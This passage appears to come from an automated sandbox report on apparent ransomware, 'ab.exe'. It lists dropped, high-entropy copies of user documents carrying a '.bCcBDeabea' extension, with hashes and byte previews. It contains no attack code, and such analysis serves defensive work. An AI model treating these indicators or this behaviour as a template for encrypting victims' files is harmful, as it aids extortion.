Preview:	...W.E6t$.]_.J..9...4..x.Y.....X....-=..Z<&.jfN........1.S..uD.p.a..v...?(!....9W..A....j^.D;9.............Dh..nQ.S.7...m.....}!w.W...ASc.. K..<.?..1...Y.K..q..H....5.Z._w.Gu7.Qi..l.h..S.a..C...........2...l."..N65.X....S..8E.(..L>....W16..X[....3D...#[.3+..kp..Q.z#..5......B...,.. ...z.......k...P....w.B....&&..e......>s4KJm......L....a.(...P.(...!..b.z.?.u..K.g....8.N.A:.x.t8......{.....z.k..... .(C.3.W...........>.f.0..fj.....?$1..qB...{....I........g...^....JxA.cv@!)..lq....6..vv.(rEX.sP....t.QsY........b=..ID....,.x.T....$..N....E....;rv......3B.....*..L....dt.."pY:..t.kT0.a(p'fx......&.jb.Ve....Vg..D.JC....cS.......,..~...?`..5../A.z.....4...&.x..,....7.q.uw..a.aW&d}......W...,Jd.D...(O.t.gb..}..N.H.Ow.~.<M.!...Y.[(!...y...^..(G.wJ....Px.<?.e..l.s#@.....g...5(f.h...^A.=.Yq.......=.g....r..{.. ..$..J..yn...q.0.2.FiR..Xf)...>..V......m...5n.%4.:t....p....Z+....C5.6k..!...n....M[..y.[...Vd."B..68..j.^..\.!....%..TSX..2.N...<.

C:\Users\user\Downloads\PWCCAWLGRE.png.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978495227142168
Encrypted:	false
SSDEEP:	192:Ko758YBOkjPt9LdPO2PjxhTOU0P9lXYJvvAMKR1ciBW2T2J4opeQmNXlG3V+n:KyYSt9LUOcxnov3au2Fa2XGw
MD5:	0F5AF6C2F989F19C79FBACD48DB09690
SHA1:	5F0F1B60FC7E3CDE2C0CD234CF1EB7A03E2E309D
SHA-256:	BC87DD765A432BE307B3CE10D9C754B409A0B400B9BC4161613455707A4024D8
SHA-512:	CAC15FC72FACB59DB2B3B26AB19C17C3140D21D2E15BEED42C2A183647BE0E242FE2121D46E8EC9BE937816588FFC7E8CA7FB70B5E873C33F0909A1D3463CDE7
Malicious:	false
Preview:	...W.E6t$.]_.J..9...4..x.Y.....X....-=..Z<&.jfN........1.S..uD.p.a..v...?(!....9W..A....j^.D;9.............Dh..nQ.S.7...m.....}!w.W...ASc.. K..<.?..1...Y.K..q..H....5.Z._w.Gu7.Qi..l.h..S.a..C...........2...l."..N65.X....S..8E.(..L>....W16..X[....3D...#[.3+..kp..Q.z#..5......B...,.. ...z.......k...P....w.B....&&..e......>s4KJm......L....a.(...P.(...!..b.z.?.u..K.g....8.N.A:.x.t8......{.....z.k..... .(C.3.W...........>.f.0..fj.....?$1..qB...{....I........g...^....JxA.cv@!)..lq....6..vv.(rEX.sP....t.QsY........b=..ID....,.x.T....$..N....E....;rv......3B.....*..L....dt.."pY:..t.kT0.a(p'fx......&.jb.Ve....Vg..D.JC....cS.......,..~...?`..5../A.z.....4...&.x..,....7.q.uw..a.aW&d}......W...,Jd.D...(O.t.gb..}..N.H.Ow.~.<M.!...Y.[(!...y...^..(G.wJ....Px.<?.e..l.s#@.....g...5(f.h...^A.=.Yq.......=.g....r..{.. ..$..J..yn...q.0.2.FiR..Xf)...>..V......m...5n.%4.:t....p....Z+....C5.6k..!...n....M[..y.[...Vd."B..68..j.^..\.!....%..TSX..2.N...<.

C:\Users\user\Downloads\QCFWYSKMHA.jpg Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979950935328355
Encrypted:	false
SSDEEP:	192:QV2ed11ibV2/uASP3tWvSp6wB1qt1cfRBVLBVBxSzycwjV+n:Q/oJpkdE61MXVLBV3cz
MD5:	F6452756A141288E73B5300DF31416C0
SHA1:	F2166AC2C5F15AB9B21B60D7471E760F743E1453
SHA-256:	ACA2DB7C8619E327515C875F3F9033B3396C1A0F0AB7EBBB69BB68DE0AAAEACD
SHA-512:	6C4589535BA3F1C0FD58C60E95D8DE00A4643DED577DB03F731406718BDC5B74A50C53BCE1F89ABA077A84B59465C8B3EB1AF935F10CD4AF04E885C8267027EA
Malicious:	false
Preview:	......6..p..^-......T.0z...\|n.(7.x.l....U....G.......y4.....8.>(A.....M.K..5j..=..Z-.L,+..wY.>.a.....B-B...[..%.?...W>E......R8...e4O..K...{..5V..n.J.\|...L.V7j.....U.N.W.9.:..~.<.?5..]q...}.L .@..r..[..Ue.../.p..(8....C...D..P.H.!.\|..M..K..,......u.9..R.P..c./.....C...r.....P/.."..DU.b...NW-,v..H9.f&.5.y....L\|pHH...,.#,P.J.r....clUz..M.....D[.].E...H....D.T......d...R.mc.._~J<BslN.......^..a.E..3l.l..:s%.X.N.\|4l..."<..\....n...ZQ...m:.=.t..UeM.ER\$V....da.#.Hm...4.WT..I......qv.U.%.~...V={>.h.rO8.`T....iD.#8......I..h.La..Z.}G......(j...mN.).V....{..%.AE..Go.f.n24.h!.J(g5...>..:op.b........v&....^A..FfF....\.....1....Sx$.:DGq.;._....f..E.6Bi..U..-N.......U{.2.c...P..,n..HS......7.."....d.H.G.3....,@z.f.V...Mn...8\|2.mXj....'k.F....&H..+....;!...^..(#..I;P.....i../..LWJN#....E...O.&.x.>.Dq...g<,.y..9...;.1r......."..:q....'.........0Rq!T(.IP1.^.. ...u.................8.y.F.>...s.p.....[e.%A.._.C1.Y.Dz..m...R..Am..z%.....2@C\Ml.gdHd.n#.

C:\Users\user\Downloads\QCFWYSKMHA.jpg.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979950935328355
Encrypted:	false
SSDEEP:	192:QV2ed11ibV2/uASP3tWvSp6wB1qt1cfRBVLBVBxSzycwjV+n:Q/oJpkdE61MXVLBV3cz
MD5:	F6452756A141288E73B5300DF31416C0
SHA1:	F2166AC2C5F15AB9B21B60D7471E760F743E1453
SHA-256:	ACA2DB7C8619E327515C875F3F9033B3396C1A0F0AB7EBBB69BB68DE0AAAEACD
SHA-512:	6C4589535BA3F1C0FD58C60E95D8DE00A4643DED577DB03F731406718BDC5B74A50C53BCE1F89ABA077A84B59465C8B3EB1AF935F10CD4AF04E885C8267027EA
Malicious:	false
Preview:	......6..p..^-......T.0z...\|n.(7.x.l....U....G.......y4.....8.>(A.....M.K..5j..=..Z-.L,+..wY.>.a.....B-B...[..%.?...W>E......R8...e4O..K...{..5V..n.J.\|...L.V7j.....U.N.W.9.:..~.<.?5..]q...}.L .@..r..[..Ue.../.p..(8....C...D..P.H.!.\|..M..K..,......u.9..R.P..c./.....C...r.....P/.."..DU.b...NW-,v..H9.f&.5.y....L\|pHH...,.#,P.J.r....clUz..M.....D[.].E...H....D.T......d...R.mc.._~J<BslN.......^..a.E..3l.l..:s%.X.N.\|4l..."<..\....n...ZQ...m:.=.t..UeM.ER\$V....da.#.Hm...4.WT..I......qv.U.%.~...V={>.h.rO8.`T....iD.#8......I..h.La..Z.}G......(j...mN.).V....{..%.AE..Go.f.n24.h!.J(g5...>..:op.b........v&....^A..FfF....\.....1....Sx$.:DGq.;._....f..E.6Bi..U..-N.......U{.2.c...P..,n..HS......7.."....d.H.G.3....,@z.f.V...Mn...8\|2.mXj....'k.F....&H..+....;!...^..(#..I;P.....i../..LWJN#....E...O.&.x.>.Dq...g<,.y..9...;.1r......."..:q....'.........0Rq!T(.IP1.^.. ...u.................8.y.F.>...s.p.....[e.%A.._.C1.Y.Dz..m...R..Am..z%.....2@C\Ml.gdHd.n#.

C:\Users\user\Downloads\QCFWYSKMHA.xlsx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.975784276628111
Encrypted:	false
SSDEEP:	192:VEhCXNXKciN7Vtpn3jZpJCpL9LxV8VQI4mkVUfV+n:FdIt1JCpt0VQIxkVUI
MD5:	FF3F0E3C5DCA7C0BBD30353E663E24B3
SHA1:	8E4B10BB4FBC58C2E6B370A48D156A01605F69F7
SHA-256:	1B57159479FA2839DA307F9761E71A03A4A8001C220796EFB79E6F31BE31CC80
SHA-512:	780D077F06329E5BE8933D4B7CE3ACC72DF69AE8EE3B63E5888C8C72BD5FBF8A45D7AA06459C40B713688885DF04243D49C5E3DB022EA0F3EE227EBD41A4A529
Malicious:	false
Preview:	8TJ .h....E...._.N`Y2..".]..d.46\.auSB....{.edm&..\g-.;..j..d.....gX.W$f..M..M..W..?.......KL....vzq..2.....T,Q..7..[TK[KH....:...f...sN..E...'.a.u.s]..O..."h.,G..9...G>4...d.....b..Z.C..:..z.+..R]..m..4M....Wc....q.yG..(.s.Q.<j...t..6..{....:M.Wn6.L....H.....Z..Von2H...._/T..^..d.n.znhK.Rq].W.u..`..D.Do..Z...j..E{.o.V.....S..dO..:.V.\|:..%....uH...\`.D.@".In.I"s.qWSP..xP..K......lJ)..'.4....\3....m0P.d.uz...2c.'E_...6.v....r.x;f..g4.gA........j....P.U.@.#..4.".h..9_H...'s1.m..=.......S.._..v.k.%7.c..0.3....Z./...D+.m.X2..~..9..}.F..5..ur...8&.c.Wi.....V.C0q.'..&.,.....w"...;...._.......Q8k.a.S....h..4.n.....C..vo.S...\Z6j...wk...../&}d@......V'.......K........49.90.A-3P....+.....w?..DM...kI>OH<Hvu.1,..O.i....>g.]........7\| ..a..V..h.$8g2...d....I[.)..y.&...;cP.<..x3...y.?.......bp1....m....$..o..;.)7}.WP)EZ.K.7..x.,.1.6C...A...7?......97.~Q/....0..N.....$...\|j5..k........%.=.:.q...1;..h E1.SYDe<H.....&...@yB.Z7.....K.z+..{.....{.!.....S

C:\Users\user\Downloads\QCFWYSKMHA.xlsx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.975784276628111
Encrypted:	false
SSDEEP:	192:VEhCXNXKciN7Vtpn3jZpJCpL9LxV8VQI4mkVUfV+n:FdIt1JCpt0VQIxkVUI
MD5:	FF3F0E3C5DCA7C0BBD30353E663E24B3
SHA1:	8E4B10BB4FBC58C2E6B370A48D156A01605F69F7
SHA-256:	1B57159479FA2839DA307F9761E71A03A4A8001C220796EFB79E6F31BE31CC80
SHA-512:	780D077F06329E5BE8933D4B7CE3ACC72DF69AE8EE3B63E5888C8C72BD5FBF8A45D7AA06459C40B713688885DF04243D49C5E3DB022EA0F3EE227EBD41A4A529
Malicious:	false
Preview:	8TJ .h....E...._.N`Y2..".]..d.46\.auSB....{.edm&..\g-.;..j..d.....gX.W$f..M..M..W..?.......KL....vzq..2.....T,Q..7..[TK[KH....:...f...sN..E...'.a.u.s]..O..."h.,G..9...G>4...d.....b..Z.C..:..z.+..R]..m..4M....Wc....q.yG..(.s.Q.<j...t..6..{....:M.Wn6.L....H.....Z..Von2H...._/T..^..d.n.znhK.Rq].W.u..`..D.Do..Z...j..E{.o.V.....S..dO..:.V.\|:..%....uH...\`.D.@".In.I"s.qWSP..xP..K......lJ)..'.4....\3....m0P.d.uz...2c.'E_...6.v....r.x;f..g4.gA........j....P.U.@.#..4.".h..9_H...'s1.m..=.......S.._..v.k.%7.c..0.3....Z./...D+.m.X2..~..9..}.F..5..ur...8&.c.Wi.....V.C0q.'..&.,.....w"...;...._.......Q8k.a.S....h..4.n.....C..vo.S...\Z6j...wk...../&}d@......V'.......K........49.90.A-3P....+.....w?..DM...kI>OH<Hvu.1,..O.i....>g.]........7\| ..a..V..h.$8g2...d....I[.)..y.&...;cP.<..x3...y.?.......bp1....m....$..o..;.)7}.WP)EZ.K.7..x.,.1.6C...A...7?......97.~Q/....0..N.....$...\|j5..k........%.=.:.q...1;..h E1.SYDe<H.....&...@yB.Z7.....K.z+..{.....{.!.....S

C:\Users\user\Downloads\QNCYCDFIJJ.docx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978397096832328
Encrypted:	false
SSDEEP:	192:vwUtvlKpg9NGEMWn38QqblqhvZILQ++xKbLV+n:H/9fGUqQ++sbs
MD5:	7AFC9E8B98EB4DA6B09BF668C3B89718
SHA1:	6C4674B5DC321A3A7DF4BEEFE9A8D01F65A4DDCD
SHA-256:	1F56CD6E237083AEC4F39BF56EE22E81D797094471A0C047EAE8AB035D69E906
SHA-512:	7EF3AC5172B285BEB3EA2B528AC18D1A4F8F11CC5C9C3986C925D21E1C0A6B961CEF8635B0C99A45CAFAAEF54F1992FAADCCD47F0D37C56548C79CE781A594B6
Malicious:	false
Preview:	..../v.x?...uw"n../.K.8.yv.....~........So<l..CR.X...?.P;........c....-;.k.K.s.\|1.e\|H9....1..H...;d.R..gs...../>........v..@>....`..p.........5b..1.w_....@.vQ.z...)..!.+e\|7.7iB#e..7.i..EWc.p...:^......6.?).0....-.Z.......p......p.A(y....3..4...L.I">. 1A.d...........m}..qg.K0...I.. ...TF.<.#_.2\.4&o...P....,.....u...Z.=.....o7..TU..}U..os...DQH.A7nS....}.7.7.F.7...s~VcJi.c.j_9.!....%3k.......#.ta..OSLk[.e.../.IL.v~.>..xe7.U..@....`...a. .W......=..f....K!..r..+.s..HY..j4..t.<.....9..OM.%..m.?..%./.\..O.....\|\|1..3<.z$...5"..e.#AXB.....K..e.........d..T.?...p.!.q~..LD.sw..$.i..4\.1.{....0}.V2Ui..k...\|U..&)...:.[F...V...{..Cr'n...p...].3_..B....;..J..'...I..Z....A..6...4.k....!.a.....?.e...<../7.3.yj.i.........y.r.......F..N.A.RS.........ZD.;.9~.....I.........w...X..2....h.x...)..}..l..@[.o.o..k..W....`...2u..[..@+_.WR..2U..a.n...,a.y........[R.P!.M...xX...m.!../S^.v..a...f.q...26.D..3aHO,:2.(s..$c...{Zx..{n.Z.=^/..`.qC....8.y..q

C:\Users\user\Downloads\QNCYCDFIJJ.docx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978397096832328
Encrypted:	false
SSDEEP:	192:vwUtvlKpg9NGEMWn38QqblqhvZILQ++xKbLV+n:H/9fGUqQ++sbs
MD5:	7AFC9E8B98EB4DA6B09BF668C3B89718
SHA1:	6C4674B5DC321A3A7DF4BEEFE9A8D01F65A4DDCD
SHA-256:	1F56CD6E237083AEC4F39BF56EE22E81D797094471A0C047EAE8AB035D69E906
SHA-512:	7EF3AC5172B285BEB3EA2B528AC18D1A4F8F11CC5C9C3986C925D21E1C0A6B961CEF8635B0C99A45CAFAAEF54F1992FAADCCD47F0D37C56548C79CE781A594B6
Malicious:	false
Preview:	..../v.x?...uw"n../.K.8.yv.....~........So<l..CR.X...?.P;........c....-;.k.K.s.\|1.e\|H9....1..H...;d.R..gs...../>........v..@>....`..p.........5b..1.w_....@.vQ.z...)..!.+e\|7.7iB#e..7.i..EWc.p...:^......6.?).0....-.Z.......p......p.A(y....3..4...L.I">. 1A.d...........m}..qg.K0...I.. ...TF.<.#_.2\.4&o...P....,.....u...Z.=.....o7..TU..}U..os...DQH.A7nS....}.7.7.F.7...s~VcJi.c.j_9.!....%3k.......#.ta..OSLk[.e.../.IL.v~.>..xe7.U..@....`...a. .W......=..f....K!..r..+.s..HY..j4..t.<.....9..OM.%..m.?..%./.\..O.....\|\|1..3<.z$...5"..e.#AXB.....K..e.........d..T.?...p.!.q~..LD.sw..$.i..4\.1.{....0}.V2Ui..k...\|U..&)...:.[F...V...{..Cr'n...p...].3_..B....;..J..'...I..Z....A..6...4.k....!.a.....?.e...<../7.3.yj.i.........y.r.......F..N.A.RS.........ZD.;.9~.....I.........w...X..2....h.x...)..}..l..@[.o.o..k..W....`...2u..[..@+_.WR..2U..a.n...,a.y........[R.P!.M...xX...m.!../S^.v..a...f.q...26.D..3aHO,:2.(s..$c...{Zx..{n.Z.=^/..`.qC....8.y..q

C:\Users\user\Downloads\QNCYCDFIJJ.pdf Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97611851427635
Encrypted:	false
SSDEEP:	192:dY2Ddw2qCMg/dMSiUHc7W71vKIDikJj0G5UngUHBAh0V+n:bDaCMxSiU3JKIDxj0fngbhl
MD5:	B5FD59306C42AB3491B462F2FC4A1CA8
SHA1:	62222ACAB376169CDC5E55F35152F52BD9F419C1
SHA-256:	1970FC26925729D777734F023BBC67C6A20A45ED264A0CF64E5ABA6857E42A28
SHA-512:	BC774D7A7B971FB60EB50C92AEDAC8F808147CD83144EE763B2A70CA6D665FCA65D320C427F58F26E1FC537593D26093F9FDE95A6FF1578B31AB78E5F8BA58EE
Malicious:	false
Preview:	.46.\|g(.m.....M.W.....Rc....~r/.%.!s....:..[..... ....... .b...k...>...z.....=.yU).(..w.x0u......a..g.}.....V:.D xND...7w;.8....mhSQ.....^..X.7T$....}y.>..pS.....d.....?.W..O5...]...aC......kt.1.o.F;r.....<........]..!....d.}~zZ...Fjiz..V...W..E..5&Js..zA.+@..bw.3gT.h..X.R3s.G......l ..KS.T$..e.S.o...>~.7......Q....eq#Pv&....B...Oc....E.{..R..C..y_.w.8...2.A.). ..c..lPZ....s.b4...[..F..V...........c...6b..;.>?......g.q......;..O.&.-.J.G....p..P.KUxf.O^.....R.{Rt.A...'..Lm+.j.c.$...?.$.F.....Ep...8RB.d.......l...A.....5..............H...~.]^.W..Y..-...]..'w..=.;.1=Lj.....T...g....'.0........t......t.8.a..ua.Pu.x.XbSEO.....!.....].t.....{q....H3.3U..l..f.z.U..1.{.pF[.Gh..u.4.F..P.......{....:..._{...P...\N+'"8l.e..K.Q.K!nG...,]3.a..a..A[......$p..;u$..}-..i.5.?.../m.....}..{.RW-...cxn$..M........Xo.6t@+@..2a .V6../...oc.6..2D0...U..w.pD.m.'M.."...%1..*..:.......b...<f.\..........^...~.4...Y.J.a...x.J.X.,....R.H.m....pT.....>.K..:.i.UK

C:\Users\user\Downloads\QNCYCDFIJJ.pdf.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97611851427635
Encrypted:	false
SSDEEP:	192:dY2Ddw2qCMg/dMSiUHc7W71vKIDikJj0G5UngUHBAh0V+n:bDaCMxSiU3JKIDxj0fngbhl
MD5:	B5FD59306C42AB3491B462F2FC4A1CA8
SHA1:	62222ACAB376169CDC5E55F35152F52BD9F419C1
SHA-256:	1970FC26925729D777734F023BBC67C6A20A45ED264A0CF64E5ABA6857E42A28
SHA-512:	BC774D7A7B971FB60EB50C92AEDAC8F808147CD83144EE763B2A70CA6D665FCA65D320C427F58F26E1FC537593D26093F9FDE95A6FF1578B31AB78E5F8BA58EE
Malicious:	false
Preview:	.46.\|g(.m.....M.W.....Rc....~r/.%.!s....:..[..... ....... .b...k...>...z.....=.yU).(..w.x0u......a..g.}.....V:.D xND...7w;.8....mhSQ.....^..X.7T$....}y.>..pS.....d.....?.W..O5...]...aC......kt.1.o.F;r.....<........]..!....d.}~zZ...Fjiz..V...W..E..5&Js..zA.+@..bw.3gT.h..X.R3s.G......l ..KS.T$..e.S.o...>~.7......Q....eq#Pv&....B...Oc....E.{..R..C..y_.w.8...2.A.). ..c..lPZ....s.b4...[..F..V...........c...6b..;.>?......g.q......;..O.&.-.J.G....p..P.KUxf.O^.....R.{Rt.A...'..Lm+.j.c.$...?.$.F.....Ep...8RB.d.......l...A.....5..............H...~.]^.W..Y..-...]..'w..=.;.1=Lj.....T...g....'.0........t......t.8.a..ua.Pu.x.XbSEO.....!.....].t.....{q....H3.3U..l..f.z.U..1.{.pF[.Gh..u.4.F..P.......{....:..._{...P...\N+'"8l.e..K.Q.K!nG...,]3.a..a..A[......$p..;u$..}-..i.5.?.../m.....}..{.RW-...cxn$..M........Xo.6t@+@..2a .V6../...oc.6..2D0...U..w.pD.m.'M.."...%1..*..:.......b...<f.\..........^...~.4...Y.J.a...x.J.X.,....R.H.m....pT.....>.K..:.i.UK

C:\Users\user\Downloads\SQSJKEBWDT.pdf Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.975993175391259
Encrypted:	false
SSDEEP:	192:IcCXrRjsMa9zzpNWODfcBFN+eeEVpr72InELQ25KsyjpJYWHuTlV+n:IrXJeRzIX+eRr0qpxX
MD5:	E713622688567A9A9D87FF44A8B7AA9B
SHA1:	67716C709A3C41655402BB122A70624F8D89E9AE
SHA-256:	E3799BCB9BAD47F40AD0D36A05FCA9707337CF395AEAFB189F6ABA97820CD1C5
SHA-512:	C692C244BAD551B4362532A1E47628E1154ED411C7DAD2A80497F785CED2CA288D955E08FC88406DA43C593D3324F3AC5317E5073C96DDAA1E20531BEE7DDF86
Malicious:	false
Preview:	.;....b=........&m......XT....'..W.3)Ww;..{.f....y.......M........Bf%..(>...tk..IO.D....u..NN.u.4.)...q@..@w.....f..z....P......T>...'J..5.g...2(.D.._`#.(e}B...9T..b.`.c.....,....\.....pW...TJ^.x5..rL....y...j.d..e.....'.D..IOQ.y....9......-.F..x........-...vb....}.&U6..$g^.E...2..MN@B.K....;.....=....A.M......qE....9"..)0a... .u..Y1....u{..\..%{M...J.Y..1.$q...N..%..._....v..8.t.`...eGDr.~.^.e3MC^nO'...ea%k..+..f.D..:.'5.C.........y.<.M=..h&!.............{5.a....I.r...;....W.^....u.1x..3...0..6.B..V...T.5..J2.<.JX.....Bx.t".OQH....A.....F..6.......b ..........l..&.Q..5..x0._3.?k...e.......H.P]...r.f......i.84....>...7..&P.r-..K..v..-.L0!.k~{G.\|En...b.....n....s...@l..N.z. QL.?..K........u9Z...E..k2..t...c....:..l?].#....T...K.`..R..O.IN...G....CI.H.pm......t.+_......w.=.&.....q.A....<tP.J...!1.........z...9.5l......k~`.{h94...G5Op.iW.z7\|w.M=....E.......5.Ed.b.....A..<D...W..z....$.~......a.s....O......i#.{Z`7...,.5..X1....xw.w.A....3..S

C:\Users\user\Downloads\SQSJKEBWDT.pdf.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.975993175391259
Encrypted:	false
SSDEEP:	192:IcCXrRjsMa9zzpNWODfcBFN+eeEVpr72InELQ25KsyjpJYWHuTlV+n:IrXJeRzIX+eRr0qpxX
MD5:	E713622688567A9A9D87FF44A8B7AA9B
SHA1:	67716C709A3C41655402BB122A70624F8D89E9AE
SHA-256:	E3799BCB9BAD47F40AD0D36A05FCA9707337CF395AEAFB189F6ABA97820CD1C5
SHA-512:	C692C244BAD551B4362532A1E47628E1154ED411C7DAD2A80497F785CED2CA288D955E08FC88406DA43C593D3324F3AC5317E5073C96DDAA1E20531BEE7DDF86
Malicious:	false
Preview:	.;....b=........&m......XT....'..W.3)Ww;..{.f....y.......M........Bf%..(>...tk..IO.D....u..NN.u.4.)...q@..@w.....f..z....P......T>...'J..5.g...2(.D.._`#.(e}B...9T..b.`.c.....,....\.....pW...TJ^.x5..rL....y...j.d..e.....'.D..IOQ.y....9......-.F..x........-...vb....}.&U6..$g^.E...2..MN@B.K....;.....=....A.M......qE....9"..)0a... .u..Y1....u{..\..%{M...J.Y..1.$q...N..%..._....v..8.t.`...eGDr.~.^.e3MC^nO'...ea%k..+..f.D..:.'5.C.........y.<.M=..h&!.............{5.a....I.r...;....W.^....u.1x..3...0..6.B..V...T.5..J2.<.JX.....Bx.t".OQH....A.....F..6.......b ..........l..&.Q..5..x0._3.?k...e.......H.P]...r.f......i.84....>...7..&P.r-..K..v..-.L0!.k~{G.\|En...b.....n....s...@l..N.z. QL.?..K........u9Z...E..k2..t...c....:..l?].#....T...K.`..R..O.IN...G....CI.H.pm......t.+_......w.=.&.....q.A....<tP.J...!1.........z...9.5l......k~`.{h94...G5Op.iW.z7\|w.M=....E.......5.Ed.b.....A..<D...W..z....$.~......a.s....O......i#.{Z`7...,.5..X1....xw.w.A....3..S

C:\Users\user\Downloads\SUAVTZKNFL.mp3 Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978511022715781
Encrypted:	false
SSDEEP:	192:/778NHhHXfX9ahix/J2mCz8u/kNqyevGB2KDxiMshTFRhxyV+n:/7INBvt8i5MmAs/eOB2KD8MqfhxH
MD5:	AE709B3F306D4BBC01D6CE5EE20416C1
SHA1:	6A295E6620A2E9CAEBF7D49D5DB2C4FCD55011F2
SHA-256:	32E71D175481BCF76D41748F096EF24056EDF88BC22A36A29189D24CB1B67BA0
SHA-512:	D4647CAAAA529588C02E55A87B538D734C44EFD5A0B981A94B82B47243FCE56079810CE11474DE5D08F133AFD9F73D86D802360FF375D338F2C3419006C5306C
Malicious:	false
Preview:	.k..V.VJa+_.:o.:..l....U.5.......B...f.9.Rs.Ui.\|`..IX_.r..w.....{iVG.?9Sn.D....&.r.u.^.$f.6....L...."...l....1.r. .Kj.]..g....w...i6./.h.m.1...%..e2Q....?.F.9.u...~T..J.......$C>[..]^.6..%..\.M.....ts.4..'X;.(.5h..Z.Id..'uU.X..\|'.T..EzqN.VI...[...7./...,a9..3..A...-\r%..z.p.:..W(..z.:~.Rq...6..K<...7......L@.f.....X#.L..]..f..y..[...(....T`..P.!.v^.-.k..Ka<.p@.......%.2ft.y...T.A.R....1n..H.r..\|..^`.. ..>......A...%..<...a^5..V6....o[9.`^.9MGQk7".....f...Z:P.v..).V...Z.v.......75....(..._.t$..<\|.S......8....S.X....v..P0..;I&...X..t....1.:..].L..>.dE...f.....~S.....vu.L9.F...c{..Xr.b.<\|?}..y...G....>.r..h9.8..F.).a.>.V.4i.o.2.y..1%ybo........C....T%.h.^.T...>b"../.E...m'....2,.lIz......~>cS.7.....Y...]....+)....Q... .k!$...t..@.x7!4.j...[T\8..B.m..0....uQ.I.zI..yX.L.,.J...~.4..e..;...U.U...yZ&....e... :..=/.......qD.C...H'.X......).....d...l..y.."...O26..5o.m.a!.....$..+..s...3d.~.....<.Nq/...E..b ...}n.~..gA..F.x.m}:.....

C:\Users\user\Downloads\SUAVTZKNFL.mp3.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978511022715781
Encrypted:	false
SSDEEP:	192:/778NHhHXfX9ahix/J2mCz8u/kNqyevGB2KDxiMshTFRhxyV+n:/7INBvt8i5MmAs/eOB2KD8MqfhxH
MD5:	AE709B3F306D4BBC01D6CE5EE20416C1
SHA1:	6A295E6620A2E9CAEBF7D49D5DB2C4FCD55011F2
SHA-256:	32E71D175481BCF76D41748F096EF24056EDF88BC22A36A29189D24CB1B67BA0
SHA-512:	D4647CAAAA529588C02E55A87B538D734C44EFD5A0B981A94B82B47243FCE56079810CE11474DE5D08F133AFD9F73D86D802360FF375D338F2C3419006C5306C
Malicious:	false
Preview:	.k..V.VJa+_.:o.:..l....U.5.......B...f.9.Rs.Ui.\|`..IX_.r..w.....{iVG.?9Sn.D....&.r.u.^.$f.6....L...."...l....1.r. .Kj.]..g....w...i6./.h.m.1...%..e2Q....?.F.9.u...~T..J.......$C>[..]^.6..%..\.M.....ts.4..'X;.(.5h..Z.Id..'uU.X..\|'.T..EzqN.VI...[...7./...,a9..3..A...-\r%..z.p.:..W(..z.:~.Rq...6..K<...7......L@.f.....X#.L..]..f..y..[...(....T`..P.!.v^.-.k..Ka<.p@.......%.2ft.y...T.A.R....1n..H.r..\|..^`.. ..>......A...%..<...a^5..V6....o[9.`^.9MGQk7".....f...Z:P.v..).V...Z.v.......75....(..._.t$..<\|.S......8....S.X....v..P0..;I&...X..t....1.:..].L..>.dE...f.....~S.....vu.L9.F...c{..Xr.b.<\|?}..y...G....>.r..h9.8..F.).a.>.V.4i.o.2.y..1%ybo........C....T%.h.^.T...>b"../.E...m'....2,.lIz......~>cS.7.....Y...]....+)....Q... .k!$...t..@.x7!4.j...[T\8..B.m..0....uQ.I.zI..yX.L.,.J...~.4..e..;...U.U...yZ&....e... :..=/.......qD.C...H'.X......).....d...l..y.."...O26..5o.m.a!.....$..+..s...3d.~.....<.Nq/...E..b ...}n.~..gA..F.x.m}:.....

C:\Users\user\Downloads\SUAVTZKNFL.pdf Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980149982104934
Encrypted:	false
SSDEEP:	192:4w3ec2WsaWbsvxv5D8Tv8CRzM8lHzref51ajMBiBV+n:4meLWsaWbavIT1ZrezvB9
MD5:	265577148DB170ECCF291E2B77A82991
SHA1:	C1806DC3A3FBF3E49393098324FCBB11496F959A
SHA-256:	B7ADDB669A237B1091FDA5C940C6DC19BA320FC4C626E24EC27B35D6F275850A
SHA-512:	42F01CEA3E0BB5FBF2BEAA43C6649BA11F27697C19F8F0285A404BFFABDC7E11091D0CAC4BE5CED65F93B7AD2F0C1A744904145E30FBC1FB15D35C2D7C5DFE16
Malicious:	false
